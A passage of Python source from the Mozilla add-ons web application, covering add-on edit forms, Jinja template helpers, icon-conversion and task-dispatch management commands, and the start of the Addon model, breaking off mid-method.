    dirs, files = storage.listdir(settings.ADDON_ICONS_DEFAULT_PATH)
    for fname in files:
        # Only consider the 32px variants, and skip the generic defaults.
        # (`'default' not in fname` replaces the non-idiomatic
        # `not 'default' in fname`.)
        if '32' in fname and 'default' not in fname:
            icon_name = fname.split('-')[0]
            icons.append(('icon/%s' % icon_name, icon_name))
    return icons
class AddonFormDetails(AddonFormBase):
    """Edit form for description, default locale and homepage."""
    default_locale = forms.TypedChoiceField(choices=Addon.LOCALES)

    class Meta:
        model = Addon
        fields = ('description', 'default_locale', 'homepage')

    def clean(self):
        # Make sure we have the required translations in the new locale.
        required = 'name', 'summary', 'description'
        data = self.cleaned_data
        if not self.errors and 'default_locale' in self.changed_data:
            # Map each required field to its translation id on the model.
            fields = dict((k, getattr(self.instance, k + '_id'))
                          for k in required)
            locale = self.cleaned_data['default_locale']
            ids = filter(None, fields.values())
            qs = (Translation.objects.filter(locale=locale, id__in=ids,
                                             localized_string__isnull=False)
                  .values_list('id', flat=True))
            missing = [k for k, v in fields.items() if v not in qs]
            # They might be setting description right now.
            # (data['description'] appears to be a locale-keyed mapping from
            # the translation widget — confirm against TransField.)
            if 'description' in missing and locale in data['description']:
                missing.remove('description')
            if missing:
                raise forms.ValidationError(
                    _('Before changing your default locale you must have a '
                      'name, summary, and description in that locale. '
                      'You are missing %s.') % ', '.join(map(repr, missing)))
        return data
class AddonFormSupport(AddonFormBase):
    """Edit form for an add-on's support email/URL; premium add-ons must
    provide a support email."""
    support_url = TransField.adapt(forms.URLField)(required=False)
    support_email = TransField.adapt(forms.EmailField)(required=False)

    class Meta:
        model = Addon
        fields = ('support_email', 'support_url')

    def __init__(self, *args, **kw):
        super(AddonFormSupport, self).__init__(*args, **kw)
        # Paid add-ons must have a contact address for support.
        if self.instance.is_premium():
            self.fields['support_email'].required = True

    def save(self, addon, commit=True):
        """Save the form.  `addon` is accepted for signature symmetry with
        the other add-on forms but is unused."""
        # Removed a dead read of `self.instance.support_url.localized_string`
        # whose result was discarded and which could raise AttributeError
        # when support_url was unset.
        return super(AddonFormSupport, self).save(commit)
class AddonFormTechnical(AddonFormBase):
    """Edit form for technical details (developer comments and boolean
    flags such as view_source and public_stats)."""
    developer_comments = TransField(widget=TransTextarea, required=False)

    class Meta:
        model = Addon
        fields = ('developer_comments', 'view_source', 'site_specific',
                  'external_software', 'auto_repackage', 'public_stats')
class AddonForm(happyforms.ModelForm):
    """Monolithic admin-style edit form covering most add-on fields,
    logging description/property edits on save."""
    name = forms.CharField(widget=TranslationTextInput,)
    homepage = forms.CharField(widget=TranslationTextInput, required=False)
    eula = forms.CharField(widget=TranslationTextInput,)
    description = forms.CharField(widget=TranslationTextInput,)
    developer_comments = forms.CharField(widget=TranslationTextInput,)
    privacy_policy = forms.CharField(widget=TranslationTextInput,)
    the_future = forms.CharField(widget=TranslationTextInput,)
    the_reason = forms.CharField(widget=TranslationTextInput,)
    support_email = forms.CharField(widget=TranslationTextInput,)

    class Meta:
        model = Addon
        fields = ('name', 'homepage', 'default_locale', 'support_email',
                  'support_url', 'description', 'summary',
                  'developer_comments', 'eula', 'privacy_policy', 'the_reason',
                  'the_future', 'view_source', 'prerelease', 'site_specific',)
        exclude = ('status', )

    def clean_name(self):
        return clean_name(self.cleaned_data['name'])

    def save(self):
        """Save and write audit-log entries for what changed."""
        desc = self.data.get('description')
        # Log a dedicated entry when the description text actually changed.
        if desc and desc != unicode(self.instance.description):
            amo.log(amo.LOG.EDIT_DESCRIPTIONS, self.instance)
        if self.changed_data:
            amo.log(amo.LOG.EDIT_PROPERTIES, self.instance)
        super(AddonForm, self).save()
class AbuseForm(happyforms.Form):
    """Abuse-report form; the captcha is only shown to anonymous users."""
    recaptcha = captcha.fields.ReCaptchaField(label='')
    text = forms.CharField(required=True,
                           label='',
                           widget=forms.Textarea())

    def __init__(self, *args, **kwargs):
        self.request = kwargs.pop('request')
        super(AbuseForm, self).__init__(*args, **kwargs)
        # Only anonymous reporters need the captcha, and only when a
        # reCAPTCHA key is actually configured.
        needs_captcha = (self.request.user.is_anonymous() and
                         settings.RECAPTCHA_PRIVATE_KEY)
        if not needs_captcha:
            del self.fields['recaptcha']
########NEW FILE########
__FILENAME__ = helpers
import jinja2
from jingo import register
from tower import ugettext as _
from . import buttons
from amo.utils import chunked
# Expose the install-button helpers to templates as global functions.
register.function(buttons.install_button)
register.function(buttons.big_install_button)
register.function(buttons.mobile_install_button)
@register.filter
@jinja2.contextfilter
def statusflags(context, addon):
    """unreviewed/recommended status flags for use as CSS classes"""
    app = context['APP']
    lang = context['LANG']
    # "unreviewed" wins over "featured" when both apply.
    if addon.is_unreviewed():
        return 'unreviewed'
    if addon.is_featured(app, lang):
        return 'featuredaddon'
    return ''
@register.filter
@jinja2.contextfilter
def flag(context, addon):
    """unreviewed/recommended flag heading."""
    status = statusflags(context, addon)
    if not status:
        return ''
    labels = {'unreviewed': _('Not Reviewed'),
              'featuredaddon': _('Featured')}
    return jinja2.Markup(u'<h5 class="flag">%s</h5>' % labels[status])
@register.inclusion_tag('addons/impala/upsell_note.html')
@jinja2.contextfunction
def upsell_note(context, addon, module_context='impala'):
    # new_context(**locals()) exposes every argument to the template under
    # its own name, so the local names here are part of the contract.
    return new_context(**locals())
@register.inclusion_tag('addons/impala/dependencies_note.html')
@jinja2.contextfunction
def dependencies_note(context, addon, module_context='impala'):
    # new_context(**locals()) exposes every argument to the template under
    # its own name, so the local names here are part of the contract.
    return new_context(**locals())
@register.inclusion_tag('addons/review_list_box.html')
@jinja2.contextfunction
def review_list_box(context, addon, reviews):
    """Details page: Show a box with three add-on reviews."""
    ctx = dict(context.items())
    ctx['addon'] = addon
    ctx['reviews'] = reviews
    return ctx
@register.inclusion_tag('addons/impala/review_list_box.html')
@jinja2.contextfunction
def impala_review_list_box(context, addon, reviews):
    """Details page: Show a box with three add-on reviews."""
    ctx = dict(context.items())
    ctx['addon'] = addon
    ctx['reviews'] = reviews
    return ctx
@register.inclusion_tag('addons/review_add_box.html')
@jinja2.contextfunction
def review_add_box(context, addon):
    """Details page: Show a box for the user to post a review."""
    ctx = dict(context.items())
    ctx.update(addon=addon)
    return ctx
@register.inclusion_tag('addons/impala/review_add_box.html')
@jinja2.contextfunction
def impala_review_add_box(context, addon):
    """Details page: Show a box for the user to post a review."""
    ctx = dict(context.items())
    ctx.update(addon=addon)
    return ctx
@register.inclusion_tag('addons/tags_box.html')
@jinja2.contextfunction
def tags_box(context, addon, tags=None):
    """
    Details page: Show a box with existing tags along with a form to add new
    ones.
    """
    ctx = dict(context.items())
    ctx['addon'] = addon
    ctx['tags'] = tags
    return ctx
@register.inclusion_tag('addons/listing/items.html')
@jinja2.contextfunction
def addon_listing_items(context, addons, show_date=False,
                        show_downloads=False, src=None, notes={}):
    # NOTE(review): `notes={}` is a mutable default; nothing here mutates
    # it, but confirm the template treats it as read-only.
    # new_context(**locals()) exposes each argument to the template under
    # its own name, so the local names are part of the contract.
    return new_context(**locals())
@register.inclusion_tag('addons/impala/listing/items.html')
@jinja2.contextfunction
def impala_addon_listing_items(context, addons, field=None, src=None,
                               dl_src=None, notes={}):
    # NOTE(review): `notes={}` is a mutable default; nothing here mutates
    # it, but confirm the template treats it as read-only.
    # src/dl_src fall back to the caller's template context; dl_src defaults
    # to src.
    if not src:
        src = context.get('src')
    if not dl_src:
        dl_src = context.get('dl_src', src)
    # Every local name becomes a template variable via new_context(**locals()).
    return new_context(**locals())
@register.inclusion_tag('addons/listing/items_compact.html')
@jinja2.contextfunction
def addon_listing_items_compact(context, addons, show_date=False, src=None):
    # new_context(**locals()) exposes each argument to the template under
    # its own name.
    return new_context(**locals())
@register.inclusion_tag('addons/listing/items_mobile.html')
@jinja2.contextfunction
def addon_listing_items_mobile(context, addons, sort=None, src=None):
    # new_context(**locals()) exposes each argument to the template under
    # its own name.
    return new_context(**locals())
@register.inclusion_tag('addons/listing_header.html')
@jinja2.contextfunction
def addon_listing_header(context, url_base, sort_opts, selected):
    # new_context(**locals()) exposes each argument to the template under
    # its own name.
    return new_context(**locals())
@register.inclusion_tag('addons/impala/listing/sorter.html')
@jinja2.contextfunction
def impala_addon_listing_header(context, url_base, sort_opts={}, selected=None,
                                extra_sort_opts={}, search_filter=None):
    # NOTE(review): the mutable defaults are safe here because both names
    # are rebound (never mutated in place) below.
    # A search_filter, when given, overrides the explicit sort arguments.
    if search_filter:
        selected = search_filter.field
        sort_opts = search_filter.opts
        if hasattr(search_filter, 'extras'):
            extra_sort_opts = search_filter.extras
    # When an "extra" sort option becomes selected, it will appear alongside
    # the normal sort options.
    old_extras = extra_sort_opts
    sort_opts, extra_sort_opts = list(sort_opts), []
    for k, v in old_extras:
        if k == selected:
            # Third tuple element marks this option as the selected extra.
            sort_opts.append((k, v, True))
        else:
            extra_sort_opts.append((k, v))
    # Every local name becomes a template variable via new_context(**locals()).
    return new_context(**locals())
@register.filter
@jinja2.contextfilter
@register.inclusion_tag('addons/impala/sidebar_listing.html')
def sidebar_listing(context, addon):
    # new_context(**locals()) exposes `context` and `addon` to the template.
    return new_context(**locals())
@register.filter
@jinja2.contextfilter
@register.inclusion_tag('addons/impala/addon_hovercard.html')
def addon_hovercard(context, addon, lazyload=False, src=None, dl_src=None):
    # src/dl_src fall back to the caller's template context; dl_src
    # defaults to src.
    if not src:
        src = context.get('src')
    if not dl_src:
        dl_src = context.get('dl_src', src)
    vital_summary = context.get('vital_summary') or 'rating'
    vital_more_default = 'downloads' if addon.is_webapp() else 'adu'
    vital_more = context.get('vital_more')
    # An explicit None in the context is respected; only a truly absent key
    # falls back to the default.
    if 'vital_more' not in context:
        vital_more = vital_more_default
    # Every local name becomes a template variable via new_context(**locals()).
    return new_context(**locals())
@register.filter
@jinja2.contextfilter
@register.inclusion_tag('addons/impala/addon_grid.html')
def addon_grid(context, addons, src=None, dl_src=None, pagesize=6, cols=2,
               vital_summary='rating', vital_more='adu'):
    if not src:
        src = context.get('src')
    # dl_src is an optional src parameter just for the download links
    if not dl_src:
        dl_src = context.get('dl_src', src)
    # Split the add-ons into template "pages" of `pagesize` items each.
    pages = chunked(addons, pagesize)
    columns = 'cols-%d' % cols
    # Every local name becomes a template variable via new_context(**locals()).
    return new_context(**locals())
@register.filter
@jinja2.contextfilter
@register.inclusion_tag('addons/impala/featured_grid.html')
def featured_grid(context, addons, src=None, dl_src=None, pagesize=3, cols=3):
    if not src:
        src = context.get('src')
    # dl_src is an optional src parameter just for the download links
    if not dl_src:
        dl_src = src
    # Split the add-ons into template "pages" of `pagesize` items each.
    pages = chunked(addons, pagesize)
    columns = '' if cols != 3 else 'three-col'
    # Every local name becomes a template variable via new_context(**locals()).
    return new_context(**locals())
@register.filter
@jinja2.contextfilter
@register.inclusion_tag('addons/impala/toplist.html')
def addon_toplist(context, addons, vital='users', src=None):
    # new_context(**locals()) exposes each argument to the template under
    # its own name.
    return new_context(**locals())
def new_context(context, **kw):
    """Return a copy of `context` (any mapping with .items()) with the
    keyword arguments merged on top."""
    merged = dict(context.items())
    for key, value in kw.items():
        merged[key] = value
    return merged
@register.inclusion_tag('addons/report_abuse.html')
@jinja2.contextfunction
def addon_report_abuse(context, hide, addon):
    # new_context(**locals()) exposes `hide` and `addon` to the template.
    return new_context(**locals())
########NEW FILE########
__FILENAME__ = convert_icons
import os
import stat
from optparse import make_option
from django.conf import settings
from django.core.management.base import BaseCommand
from django.core.files.storage import default_storage as storage
from addons.models import Addon
import amo
from amo.decorators import write
from amo.storage_utils import walk_storage
from amo.utils import resize_image, chunked
extensions = ['.png', '.jpg', '.gif']
sizes = amo.ADDON_ICON_SIZES
size_suffixes = ['-%s' % s for s in sizes]
@write
def convert(directory, delete=False):
    """Walk `directory` and generate the per-size PNG variants for every
    source icon, updating icon_type for converted non-PNG add-ons.

    When `delete` is true, the original (pre-resize) files are removed.
    """
    print 'Converting icons in %s' % directory
    # Add-on ids (taken from filenames) whose icons were converted from a
    # non-PNG format and therefore need icon_type updated.
    pks = []
    k = 0
    for path, names, filenames in walk_storage(directory):
        for filename in filenames:
            old = os.path.join(path, filename)
            pre, ext = os.path.splitext(old)
            # Skip files that are already size variants (e.g. "-32") or
            # aren't a supported image extension.
            if (pre[-3:] in size_suffixes or ext not in extensions):
                continue
            if not storage.size(old):
                print 'Icon %s is empty, ignoring.' % old
                continue
            for size, size_suffix in zip(sizes, size_suffixes):
                new = '%s%s%s' % (pre, size_suffix, '.png')
                # NOTE(review): existence is checked with os.path while the
                # rest uses the storage API — confirm local storage is the
                # only backend this command runs against.
                if os.path.exists(new):
                    continue
                resize_image(old, new, (size, size), remove_src=False)
            if ext != '.png':
                pks.append(os.path.basename(pre))
            if delete:
                storage.delete(old)
            k += 1
            if not k % 1000:
                print "... converted %s" % k
    for chunk in chunked(pks, 100):
        Addon.objects.filter(pk__in=chunk).update(icon_type='image/png')
class Command(BaseCommand):
    """Management command wrapper around convert() for the icons dir."""
    help = 'Process icons to -32, -48, -64 and optionally delete'
    option_list = BaseCommand.option_list + (
        make_option('--delete', action='store_true',
                    dest='delete', help='Deletes the old icons.'),
    )

    def handle(self, *args, **options):
        start_dir = settings.ADDON_ICONS_PATH
        convert(start_dir, delete=options.get('delete'))
########NEW FILE########
__FILENAME__ = process_addons
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from django.db.models import Q
from celery import chord, group
import amo
from addons.models import Addon
from amo.utils import chunked
from mkt.webapps.tasks import (add_uuids, clean_apps, dump_apps,
fix_missing_icons, import_manifests,
regenerate_icons_and_thumbnails,
update_manifests, update_supported_locales,
zip_apps)
# Registry of runnable maintenance tasks for the process_addons command.
# Each entry maps a task name to:
#   method: the celery task to fan out over chunks of add-on pks
#   qs:     a list of Q objects selecting the add-ons to process
#   pre:    (optional) in-process hook run over the pks before dispatch
#   post:   (optional) task chained after all chunks complete (via chord)
tasks = {
    'update_manifests': {'method': update_manifests,
                         'qs': [Q(type=amo.ADDON_WEBAPP, is_packaged=False,
                                  status__in=[amo.STATUS_PENDING,
                                              amo.STATUS_PUBLIC,
                                              amo.STATUS_PUBLIC_WAITING],
                                  disabled_by_user=False)]},
    'add_uuids': {'method': add_uuids,
                  'qs': [Q(type=amo.ADDON_WEBAPP, guid=None),
                         ~Q(status=amo.STATUS_DELETED)]},
    'update_supported_locales': {
        'method': update_supported_locales,
        'qs': [Q(type=amo.ADDON_WEBAPP, disabled_by_user=False,
                 status__in=[amo.STATUS_PENDING, amo.STATUS_PUBLIC,
                             amo.STATUS_PUBLIC_WAITING])]},
    'dump_apps': {'method': dump_apps,
                  'qs': [Q(type=amo.ADDON_WEBAPP, status=amo.STATUS_PUBLIC,
                           disabled_by_user=False)],
                  'pre': clean_apps,
                  'post': zip_apps},
    'fix_missing_icons': {'method': fix_missing_icons,
                          'qs': [Q(type=amo.ADDON_WEBAPP,
                                   status__in=[amo.STATUS_PENDING,
                                               amo.STATUS_PUBLIC,
                                               amo.STATUS_PUBLIC_WAITING],
                                   disabled_by_user=False)]},
    'regenerate_icons_and_thumbnails':
        {'method': regenerate_icons_and_thumbnails,
         'qs': [Q(type=amo.ADDON_WEBAPP,
                  status__in=[amo.STATUS_PENDING,
                              amo.STATUS_PUBLIC,
                              amo.STATUS_PUBLIC_WAITING],
                  disabled_by_user=False)]},
    'import_manifests': {'method': import_manifests,
                         'qs': [Q(type=amo.ADDON_WEBAPP,
                                  disabled_by_user=False)]},
}
class Command(BaseCommand):
    """
    A generic command to run a task on addons.

    Add tasks to the tasks dictionary, providing a list of Q objects if you'd
    like to filter the list down.

    method: the method to delay
    pre: a method to further pre process the pks, must return the pks (opt.)
    qs: a list of Q objects to apply to the method
    kwargs: any extra kwargs you want to apply to the delay method (optional)
    """
    option_list = BaseCommand.option_list + (
        make_option('--task', action='store', type='string',
                    dest='task', help='Run task on the addons.'),
    )

    def handle(self, *args, **options):
        task = tasks.get(options.get('task'))
        if not task:
            raise CommandError('Unknown task provided. Options are: %s'
                               % ', '.join(tasks.keys()))
        pks = (Addon.objects.filter(*task['qs'])
                            .values_list('pk', flat=True)
                            .order_by('-last_updated'))
        if 'pre' in task:
            # This is run in process to ensure its run before the tasks.
            pks = task['pre'](pks)
        if pks:
            kw = task.get('kwargs', {})
            # All the remaining tasks go in one group.
            grouping = []
            for chunk in chunked(pks, 100):
                grouping.append(
                    task['method'].subtask(args=[chunk], kwargs=kw))

            # Add the post task on to the end.
            post = None
            if 'post' in task:
                # chord() runs `post` once every subtask in `grouping`
                # has finished.
                post = task['post'].subtask(args=[], kwargs=kw, immutable=True)
                ts = chord(grouping, post)
            else:
                ts = group(grouping)
            ts.apply_async()
########NEW FILE########
__FILENAME__ = models
# -*- coding: utf-8 -*-
import itertools
import os
import re
import time
from datetime import datetime, timedelta
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.db import models, transaction
from django.db.models import signals as dbsignals
from django.db.models import Max, Q
from django.dispatch import receiver
from django.utils.translation import trans_real as translation
import caching.base as caching
import commonware.log
import json_field
from jinja2.filters import do_dictsort
from tower import ugettext_lazy as _
import amo
import amo.models
from access import acl
from addons import query, signals
from addons.utils import get_featured_ids
from amo.decorators import use_master, write
from amo.fields import DecimalCharField
from amo.helpers import absolutify
from amo.urlresolvers import get_outgoing_url, reverse
from amo.utils import (attach_trans_dict, find_language, send_mail, slugify,
sorted_groupby, timer, to_language, urlparams)
from files.models import File
from reviews.models import Review
from tags.models import Tag
from translations.fields import (LinkifiedField, PurifiedField, save_signal,
TranslatedField, Translation)
from translations.query import order_by_translation
from users.models import UserForeignKey, UserProfile
from versions.compare import version_int
from versions.models import Version
from mkt.prices.models import AddonPremium, Price
log = commonware.log.getLogger('z.addons')
def clean_slug(instance, slug_field='slug'):
    """Cleans a model instance slug.

    This strives to be as generic as possible as it's used by Addons, Webapps
    and maybe less in the future. :-D

    Mutates ``instance`` in place and returns it.

    Raises:
        RuntimeError: when no free slug variation can be found. The de-clash
            scheme only guarantees the first ~100 clashes for slugs at or
            near ``max_length`` (see comment at the bottom).
    """
    slug = getattr(instance, slug_field, None) or instance.name
    if not slug:
        # Initialize the slug with what we have available: a name translation,
        # or the id of the instance, or in last resort the model name.
        translations = Translation.objects.filter(id=instance.name_id)
        if translations.exists():
            slug = translations[0]
        elif instance.id:
            slug = str(instance.id)
        else:
            slug = instance.__class__.__name__
    max_length = instance._meta.get_field_by_name(slug_field)[0].max_length
    slug = slugify(slug)[:max_length]
    if BlacklistedSlug.blocked(slug):
        # Blocked slugs get a trailing "~" to make them acceptable.
        slug = slug[:max_length - 1] + '~'
    # The following trick makes sure we are using a manager that returns
    # all the objects, as otherwise we could have a slug clash on our hands.
    # Eg with the "Addon.objects" manager, which doesn't list deleted addons,
    # we could have a "clean" slug which is in fact already assigned to an
    # already existing (deleted) addon.
    # Also, make sure we use the base class (eg Webapp, which inherits from
    # Addon, shouldn't clash with addons). This is extra paranoid, as webapps
    # have a different slug field, but just in case we need this in the future.
    manager = models.Manager()
    manager.model = instance._meta.proxy_for_model or instance.__class__
    qs = manager.values_list(slug_field, flat=True)  # Get list of all slugs.
    if instance.id:
        qs = qs.exclude(pk=instance.id)  # Can't clash with itself.
    # We first need to make sure there's a clash, before trying to find a
    # suffix that is available. Eg, if there's a "foo-bar" slug, "foo" is still
    # available.
    clash = qs.filter(**{slug_field: slug})
    if clash.exists():
        # Leave space for "-" and 99 clashes.
        slug = slugify(slug)[:max_length - 3]
        # There is a clash, so find a suffix that will make this slug unique.
        prefix = '%s-' % slug
        lookup = {'%s__startswith' % slug_field: prefix}
        clashes = qs.filter(**lookup)
        # Try numbers between 1 and the number of clashes + 1 (+ 1 because we
        # start the range at 1, not 0):
        # if we have two clashes "foo-1" and "foo-2", we need to try "foo-x"
        # for x between 1 and 3 to be absolutely sure to find an available one.
        for idx in range(1, len(clashes) + 2):
            # NOTE: "new not in clashes" hits the DB on each iteration.
            new = ('%s%s' % (prefix, idx))[:max_length]
            if new not in clashes:
                slug = new
                break
        else:
            # This could happen. The current implementation (using
            # ``[:max_length -3]``) only works for the first 100 clashes in the
            # worst case (if the slug is equal to or longuer than
            # ``max_length - 3`` chars).
            # After that, {verylongslug}-100 will be trimmed down to
            # {verylongslug}-10, which is already assigned, but it's the last
            # solution tested.
            raise RuntimeError
    setattr(instance, slug_field, slug)
    return instance
class AddonManager(amo.models.ManagerBase):
    """Manager for Addon.

    Hides soft-deleted add-ons unless ``include_deleted`` is True, and
    applies ``Addon.transformer`` so related objects are attached in bulk.
    """

    def __init__(self, include_deleted=False):
        amo.models.ManagerBase.__init__(self)
        self.include_deleted = include_deleted

    def get_query_set(self):
        qs = super(AddonManager, self).get_query_set()
        qs = qs._clone(klass=query.IndexQuerySet)
        if not self.include_deleted:
            qs = qs.exclude(status=amo.STATUS_DELETED)
        return qs.transform(Addon.transformer)

    def id_or_slug(self, val):
        """Filter by numeric id or by slug, depending on what `val` is."""
        if isinstance(val, basestring) and not val.isdigit():
            return self.filter(slug=val)
        return self.filter(id=val)

    def enabled(self):
        """Add-ons not disabled by their developer."""
        return self.filter(disabled_by_user=False)

    def public(self):
        """Get public add-ons only"""
        return self.filter(self.valid_q([amo.STATUS_PUBLIC]))

    def reviewed(self):
        """Get add-ons with a reviewed status"""
        return self.filter(self.valid_q(amo.REVIEWED_STATUSES))

    def unreviewed(self):
        """Get only unreviewed add-ons"""
        return self.filter(self.valid_q(amo.UNREVIEWED_STATUSES))

    def valid(self):
        """Get valid, enabled add-ons only"""
        return self.filter(self.valid_q(amo.LISTED_STATUSES))

    def valid_and_disabled(self):
        """
        Get valid, enabled and disabled add-ons.
        """
        statuses = list(amo.LISTED_STATUSES) + [amo.STATUS_DISABLED]
        return (self.filter(Q(status__in=statuses) | Q(disabled_by_user=True))
                .exclude(_current_version__isnull=True))

    def featured(self, app, lang=None, type=None):
        """
        Filter for all featured add-ons for an application in all locales.
        """
        ids = get_featured_ids(app, lang, type)
        return amo.models.manual_order(self.listed(app), ids, 'addons.id')

    def listed(self, app, *status):
        """
        Listed add-ons have a version with a file matching ``status`` and are
        not disabled. Self-hosted add-ons will be returned too.
        """
        if len(status) == 0:
            status = [amo.STATUS_PUBLIC]
        return self.filter(self.valid_q(status), appsupport__app=app.id)

    def top_free(self, app, listed=True):
        """Free add-ons for `app`, ordered by weekly downloads."""
        qs = (self.listed(app) if listed else
              self.filter(appsupport__app=app.id))
        return (qs.exclude(premium_type__in=amo.ADDON_PREMIUMS)
                .exclude(addonpremium__price__price__isnull=False)
                .order_by('-weekly_downloads')
                .with_index(addons='downloads_type_idx'))

    def top_paid(self, app, listed=True):
        """Paid add-ons (with a price set) for `app`, by weekly downloads."""
        qs = (self.listed(app) if listed else
              self.filter(appsupport__app=app.id))
        return (qs.filter(premium_type__in=amo.ADDON_PREMIUMS,
                          addonpremium__price__price__isnull=False)
                .order_by('-weekly_downloads')
                .with_index(addons='downloads_type_idx'))

    def valid_q(self, status=None, prefix=''):
        """
        Return a Q object that selects a valid Addon with the given statuses.

        An add-on is valid if not disabled and has a current version.
        ``prefix`` can be used if you're not working with Addon directly and
        need to hop across a join, e.g. ``prefix='addon__'`` in
        CollectionAddon.
        """
        # `status` used to default to a shared mutable list ([]); default to
        # None instead (the falsy check below already handles both).
        if not status:
            status = [amo.STATUS_PUBLIC]

        def q(*args, **kw):
            if prefix:
                kw = dict((prefix + k, v) for k, v in kw.items())
            return Q(*args, **kw)

        return q(q(_current_version__isnull=False),
                 disabled_by_user=False, status__in=status)
class Addon(amo.models.OnChangeMixin, amo.models.ModelBase):
    """Core model for add-ons; also backs marketplace apps via the Webapp
    proxy (see ``__new__`` below, which swaps the class based on ``type``).
    """
    STATUS_CHOICES = amo.STATUS_CHOICES.items()
    LOCALES = [(translation.to_locale(k).replace('_', '-'), v) for k, v in
               do_dictsort(settings.LANGUAGES)]
    guid = models.CharField(max_length=255, unique=True, null=True)
    slug = models.CharField(max_length=30, unique=True, null=True)
    # This column is only used for webapps, so they can have a slug namespace
    # separate from addons and personas.
    app_slug = models.CharField(max_length=30, unique=True, null=True,
                                blank=True)
    name = TranslatedField(default=None)
    default_locale = models.CharField(max_length=10,
                                      default=settings.LANGUAGE_CODE,
                                      db_column='defaultlocale')
    type = models.PositiveIntegerField(db_column='addontype_id', default=0)
    status = models.PositiveIntegerField(
        choices=STATUS_CHOICES, db_index=True, default=0)
    highest_status = models.PositiveIntegerField(
        choices=STATUS_CHOICES, default=0,
        help_text='An upper limit for what an author can change.',
        db_column='higheststatus')
    icon_type = models.CharField(max_length=25, blank=True,
                                 db_column='icontype')
    icon_hash = models.CharField(max_length=8, blank=True, null=True)
    # Translated / purified text fields.
    homepage = TranslatedField()
    support_email = TranslatedField(db_column='supportemail')
    support_url = TranslatedField(db_column='supporturl')
    description = PurifiedField(short=False)
    summary = LinkifiedField()
    developer_comments = PurifiedField(db_column='developercomments')
    eula = PurifiedField()
    privacy_policy = PurifiedField(db_column='privacypolicy')
    the_reason = PurifiedField()
    the_future = PurifiedField()
    # Aggregated ratings/downloads statistics, updated by cron/tasks
    # elsewhere.
    average_rating = models.FloatField(max_length=255, default=0, null=True,
                                       db_column='averagerating')
    bayesian_rating = models.FloatField(default=0, db_index=True,
                                        db_column='bayesianrating')
    total_reviews = models.PositiveIntegerField(default=0,
                                                db_column='totalreviews')
    weekly_downloads = models.PositiveIntegerField(
        default=0, db_column='weeklydownloads', db_index=True)
    total_downloads = models.PositiveIntegerField(
        default=0, db_column='totaldownloads')
    hotness = models.FloatField(default=0, db_index=True)
    average_daily_downloads = models.PositiveIntegerField(default=0)
    average_daily_users = models.PositiveIntegerField(default=0)
    share_count = models.PositiveIntegerField(default=0, db_index=True,
                                              db_column='sharecount')
    last_updated = models.DateTimeField(
        db_index=True, null=True,
        help_text='Last time this add-on had a file/version update')
    ts_slowness = models.FloatField(
        db_index=True, null=True,
        help_text='How much slower this add-on makes browser ts tests. '
                  'Read as {addon.ts_slowness}% slower.')
    # Developer-controlled disable flag (admins use STATUS_DISABLED instead).
    disabled_by_user = models.BooleanField(default=False, db_index=True,
                                           db_column='inactive')
    trusted = models.BooleanField(default=False)
    view_source = models.BooleanField(default=True, db_column='viewsource')
    public_stats = models.BooleanField(default=False, db_column='publicstats')
    prerelease = models.BooleanField(default=False)
    admin_review = models.BooleanField(default=False, db_column='adminreview')
    admin_review_type = models.PositiveIntegerField(
        choices=amo.ADMIN_REVIEW_TYPES.items(), default=amo.ADMIN_REVIEW_FULL)
    site_specific = models.BooleanField(default=False,
                                        db_column='sitespecific')
    external_software = models.BooleanField(default=False,
                                            db_column='externalsoftware')
    dev_agreement = models.BooleanField(
        default=False, help_text='Has the dev agreement been signed?')
    auto_repackage = models.BooleanField(
        default=True, help_text='Automatically upgrade jetpack add-on to a '
                                'new sdk version?')
    outstanding = models.BooleanField(default=False)
    nomination_message = models.TextField(null=True,
                                          db_column='nominationmessage')
    target_locale = models.CharField(
        max_length=255, db_index=True, blank=True, null=True,
        help_text='For dictionaries and language packs')
    locale_disambiguation = models.CharField(
        max_length=255, blank=True, null=True,
        help_text='For dictionaries and language packs')
    # Contributions / payments configuration.
    wants_contributions = models.BooleanField(default=False)
    paypal_id = models.CharField(max_length=255, blank=True)
    charity = models.ForeignKey('Charity', null=True)
    # TODO(jbalogh): remove nullify_invalid once remora dies.
    suggested_amount = DecimalCharField(
        max_digits=8, decimal_places=2, nullify_invalid=True, blank=True,
        null=True, help_text=_(u'Users have the option of contributing more '
                               u'or less than this amount.'))
    total_contributions = DecimalCharField(max_digits=8, decimal_places=2,
                                           nullify_invalid=True, blank=True,
                                           null=True)
    annoying = models.PositiveIntegerField(
        choices=amo.CONTRIB_CHOICES, default=0,
        help_text=_(u'Users will always be asked in the Add-ons'
                    u' Manager (Firefox 4 and above)'))
    enable_thankyou = models.BooleanField(
        default=False, help_text='Should the thank you note be sent to '
                                 'contributors?')
    thankyou_note = TranslatedField()
    authors = models.ManyToManyField('users.UserProfile', through='AddonUser',
                                     related_name='addons')
    categories = models.ManyToManyField('Category', through='AddonCategory')
    premium_type = models.PositiveIntegerField(
        choices=amo.ADDON_PREMIUM_TYPES.items(), default=amo.ADDON_FREE)
    manifest_url = models.URLField(max_length=255, blank=True, null=True)
    app_domain = models.CharField(max_length=255, blank=True, null=True,
                                  db_index=True)
    # Denormalized version pointers, kept in sync by update_version().
    _current_version = models.ForeignKey(Version, db_column='current_version',
                                         related_name='+', null=True,
                                         on_delete=models.SET_NULL)
    # This is for Firefox only.
    _backup_version = models.ForeignKey(
        Version, related_name='___backup', db_column='backup_version',
        null=True, on_delete=models.SET_NULL)
    _latest_version = models.ForeignKey(Version, db_column='latest_version',
                                        on_delete=models.SET_NULL,
                                        null=True, related_name='+')
    make_public = models.DateTimeField(null=True)
    mozilla_contact = models.EmailField(blank=True)
    vip_app = models.BooleanField(default=False)
    priority_review = models.BooleanField(default=False)
    # Whether the app is packaged or not (aka hosted).
    is_packaged = models.BooleanField(default=False, db_index=True)
    enable_new_regions = models.BooleanField(default=False, db_index=True)
    # Annotates disabled apps from the Great IARC purge for auto-reapprove.
    # Note: for currently PUBLIC apps only.
    iarc_purged = models.BooleanField(default=False)
    # This is the public_id to a Generic Solitude Product
    solitude_public_id = models.CharField(max_length=255, null=True, blank=True)
    # Default manager hides deleted add-ons; with_deleted includes them.
    objects = AddonManager()
    with_deleted = AddonManager(include_deleted=True)
    class Meta:
        db_table = 'addons'
    @staticmethod
    def __new__(cls, *args, **kw):
        # Return a Webapp instead of an Addon if the `type` column says this is
        # really a webapp.
        try:
            # Cached positional index of the `type` field, so we can peek at
            # positional args coming straight from a DB row.
            type_idx = Addon._meta._type_idx
        except AttributeError:
